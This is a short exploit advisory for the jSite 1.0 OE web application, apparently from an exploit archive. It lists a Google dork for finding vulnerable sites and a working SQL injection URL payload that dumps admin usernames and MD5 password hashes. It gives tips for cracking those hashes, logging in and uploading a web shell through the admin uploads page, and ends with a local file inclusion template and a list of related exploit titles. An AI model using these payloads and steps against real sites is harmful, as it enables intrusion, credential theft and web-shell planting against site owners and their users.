--== ================================================================================ ==--
--== jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility ==--
--== ================================================================================ ==--
-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=[ SQL Injection Exploit ]=-=-=-=-=-=-=-=-=-=-=-=-
AUTHOR: S.W.A.T.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
Download: http://www.sclek.com/jsite.zip
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DORK (google): "Powered by jSite 1.0 OE"
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DESCRIPTION:
You Can See Admin User & MD5 Password ..::.. Then You Can Crack It & Login ;)
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
EXPLOITS:
www.site.com/?page=-1/**/union/**/select/**/1,2,3,concat_ws
(0x3a,user,pass),admin/**/from/**/jsite_users/*
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
NOTE/TIP:
1 Week Off & I Be Back :D ;)
Admin Login Is At /admin/
U Can Upload Your Shell When U Login Successfully
From This Link: www.site.com/admin/index.php?menu=uploads
& Your Shell Will Be Appear Here: www.site.com/uploads/[file].php
-=-=-=-=-=-=--=-=-=-=-=-=-=-[ Local File Inclusion ]=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Exploit:
www.[target].com/Script/index.php?module=[LFI]
--== ================================================================================ ==--
--== jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility ==--
--== ================================================================================ ==--
【jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities】相关文章:
★ phsBlog 0.2 Bypass SQL Injection Filtering Exploit
★ Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
★ FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)
★ Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities
★ BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability
★ BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution
★ Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit
★ Maian Greetings 2.1 Insecure Cookie Handling Vulnerability
★ Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)
★ Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit